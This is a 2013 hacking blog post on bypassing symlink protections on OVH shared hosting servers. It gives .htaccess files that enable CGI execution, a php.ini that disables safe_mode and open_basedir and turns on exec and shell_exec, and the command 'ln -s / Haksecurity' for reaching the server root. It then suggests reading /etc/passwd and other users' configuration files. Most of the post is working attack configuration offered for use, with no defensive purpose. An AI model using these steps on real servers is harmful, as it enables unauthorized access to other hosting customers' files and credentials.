Tuesday, July 30, 2013

Hello everybody , today i’m going to explain how to bypass symlink in ovh server, well most of hackers find problem in ovh when trying to symlink the server ! this method  was  found by Mauritania Attacker and it’s still private , but i decided it to publish it in public.



First you gonna create a dir call it what you want example “Hak” then create a ‘.htaccess” file in the folder “Hak”


CODE:


Options FollowSymLinks MultiViews Indexes ExecCGI


AddType application/x-httpd-cgi .lnx


AddHandler cgi-script .lnx

AddHandler cgi-script .lnx



Secondly  we gonna create a second folder we call it example “Haksecurity” we also make an “.htaccess” file


CODE:


#Developped by Mauritania Attacker

Options +FollowSymLinks

DirectoryIndex Index.html

Options +Indexes


AddType text/plain .php

AddHandler server-parsed .php


AddType root .root

AddHandler cgi-script .root

AddHandler cgi-script .root



Then we create also in the folder “Haksecurity” a file called “php.ini”


CODE:


safe_mode = Off

disable_functions =

safe_mode_gid = Off

open_basedir = Off

register_globals = on

exec = On

shell_exec = On


so here we come to the last  part !


we gonna retrieve the configs by typing the following command :


ln -s / Haksecurity


Here we go we have succesfully retrieved the root path , so now to find the configs , we can upload a perl file in “Haksecurity” and paste the users of the server “etc/passwd”

and the rest is very basic.
30 Jul 2013

0 comments :

Post a Comment

:) :)) ;(( :-) =)) ;( ;-( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ $-) (b) (f) x-) (k) (h) (c) cheer
Click to see the code!
To insert emoticon you must added at least one space before the code.